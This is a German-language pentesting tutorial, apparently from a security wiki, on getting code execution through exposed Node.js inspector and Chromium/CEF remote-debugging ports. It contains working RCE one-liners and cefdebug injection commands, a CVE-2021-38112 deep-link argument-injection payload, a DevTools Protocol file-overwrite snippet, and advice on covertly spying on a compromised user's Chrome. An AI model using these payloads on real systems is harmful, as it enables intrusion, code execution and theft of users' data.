Grundlegende Informationen

Aus den Dokumenten: Wenn mit dem --inspect-Schalter gestartet, lauscht ein Node.js-Prozess auf einen Debugging-Client. Standardmäßig wird er am Host und Port 127.0.0.1:9229 lauschen. Jeder Prozess erhält auch eine eindeutige UUID.

Inspektor-Clients müssen Hostadresse, Port und UUID kennen und angeben, um eine Verbindung herzustellen. Eine vollständige URL wird etwas wie ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e aussehen.

Es gibt mehrere Möglichkeiten, einen Inspektor zu starten:

node --inspect app.js #Will run the inspector in port 9229
node --inspect=4444 app.js #Will run the inspector in port 4444
node --inspect=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and port 4444
# --inspect-brk is equivalent to --inspect

node --inspect --inspect-port=0 app.js #Will run the inspector in a random port
# Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector

Wenn Sie einen überwachten Prozess starten, wird etwas Ähnliches wie dies angezeigt:

Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d
For help, see: https://nodejs.org/en/docs/inspector

Prozesse basierend auf CEF (Chromium Embedded Framework) müssen den Parameter verwenden: --remote-debugging-port=9222, um den Debugger zu öffnen (die SSRF-Schutzmaßnahmen bleiben sehr ähnlich). Stattdessen wird anstelle einer NodeJS Debug-Sitzung mit dem Browser über das Chrome DevTools Protocol kommuniziert. Dies ist eine Schnittstelle zur Steuerung des Browsers, aber es gibt keine direkte RCE.

Wenn Sie einen debuggten Browser starten, wird etwas Ähnliches wie dies angezeigt:

DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369

Browser, WebSockets und die Same-Origin-Richtlinie

Websites, die in einem Webbrowser geöffnet sind, können WebSocket- und HTTP-Anfragen gemäß dem Browser-Sicherheitsmodell stellen. Eine initiale HTTP-Verbindung ist erforderlich, um eine eindeutige Debugger-Sitzungs-ID zu erhalten. Die Same-Origin-Richtlinie verhindert, dass Websites in der Lage sind, diese HTTP-Verbindung herzustellen. Zur zusätzlichen Sicherheit gegen DNS-Rebinding-Angriffe, überprüft Node.js, dass die 'Host'-Header für die Verbindung entweder eine IP-Adresse oder localhost oder localhost6 genau angeben.

Starten des Inspektors in laufenden Prozessen

Sie können das Signal SIGUSR1 an einen laufenden Node.js-Prozess senden, um ihn dazu zu bringen, den Inspektor am Standardport zu starten. Beachten Sie jedoch, dass Sie ausreichende Berechtigungen benötigen, sodass dies Ihnen möglicherweise privilegierten Zugriff auf Informationen innerhalb des Prozesses gewährt, jedoch keine direkte Privilegieneskalation.

kill -s SIGUSR1 <nodejs-ps>
# After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d

Verbindung zum Inspector/Debugger herstellen

Um eine Verbindung zu einem Chromium-basierten Browser herzustellen, können die URLs chrome://inspect oder edge://inspect für Chrome bzw. Edge aufgerufen werden. Durch Klicken auf die Schaltfläche "Konfigurieren" sollte sichergestellt werden, dass der Zielhost und -port korrekt aufgeführt sind. Das Bild zeigt ein Beispiel für eine Remote Code Execution (RCE):

Mit dem Befehlszeilenbefehl können Sie eine Verbindung zu einem Debugger/Inspector herstellen:

node inspect <ip>:<port>
node inspect 127.0.0.1:9229
# RCE example from debug console
debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')")

Das Tool https://github.com/taviso/cefdebug ermöglicht es, Inspectors zu finden, die lokal ausgeführt werden, und Code in sie einzuspritzen.

#List possible vulnerable sockets
./cefdebug.exe
#Check if possibly vulnerable
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version"
#Exploit it
./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')"

RCE in NodeJS Debugger/Inspector

Einige gängige Möglichkeiten, um RCE zu erhalten, wenn Sie sich mit einem Node Inspector verbinden, sind beispielsweise (es scheint, dass dies nicht funktioniert, wenn Sie mit dem Chrome DevTools-Protokoll verbunden sind):

process.mainModule.require('child_process').exec('calc')
window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe")
require('child_process').spawnSync('calc.exe')
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))

Chrome DevTools Protocol Payloads

Sie können die API hier überprüfen: https://chromedevtools.github.io/devtools-protocol/ In diesem Abschnitt werde ich nur interessante Dinge auflisten, die ich gefunden habe, die von Leuten genutzt wurden, um dieses Protokoll auszunutzen.

Parameterinjektion über Deep Links

Im CVE-2021-38112 entdeckte Rhino Security, dass eine Anwendung, die auf CEF basiert, eine benutzerdefinierte URI im System registriert hat (workspaces://), die die vollständige URI empfing und dann die CEF-basierte Anwendung mit einer Konfiguration startete, die teilweise aus dieser URI erstellt wurde.

Es wurde festgestellt, dass die URI-Parameter URL-dekodiert und verwendet wurden, um die CEF-Basisanwendung zu starten, was einem Benutzer ermöglichte, die Flagge --gpu-launcher in der Befehlszeile einzufügen und beliebige Dinge auszuführen.

Also, ein Payload wie:

workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE

Dateien überschreiben

Ändern Sie den Ordner, in dem heruntergeladene Dateien gespeichert werden sollen, und laden Sie eine Datei herunter, um den häufig verwendeten Quellcode der Anwendung mit Ihrem bösartigen Code zu überschreiben.

ws = new WebSocket(url); //URL of the chrome devtools service
ws.send(JSON.stringify({
id: 42069,
method: 'Browser.setDownloadBehavior',
params: {
behavior: 'allow',
downloadPath: '/code/'
}
}));

Webdriver RCE und Exfiltration

Gemäß diesem Beitrag: https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148 ist es möglich, RCE zu erlangen und interne Seiten von theriver zu exfiltrieren.

Post-Exploitation

In einer realen Umgebung und nach Kompromittierung eines Benutzer-PCs, der einen Chrome/Chromium-basierten Browser verwendet, könnten Sie einen Chrome-Prozess mit aktiviertem Debugging starten und den Debugging-Port weiterleiten, um darauf zuzugreifen. Auf diese Weise können Sie alles inspizieren, was das Opfer mit Chrome macht, und sensible Informationen stehlen.

Der unauffällige Weg besteht darin, jeden Chrome-Prozess zu beenden und dann etwas Ähnliches aufzurufen.

Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"

Referenzen

• https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s

• https://github.com/taviso/cefdebug

• https://iwantmore.pizza/posts/cve-2019-1414.html

• https://bugs.chromium.org/p/project-zero/issues/detail?id=773

• https://bugs.chromium.org/p/project-zero/issues/detail?id=1742

• https://bugs.chromium.org/p/project-zero/issues/detail?id=1944

• https://nodejs.org/en/docs/guides/debugging-getting-started/

• https://chromedevtools.github.io/devtools-protocol/

• https://larry.science/post/corctf-2021/#saasme-2-solves

• https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/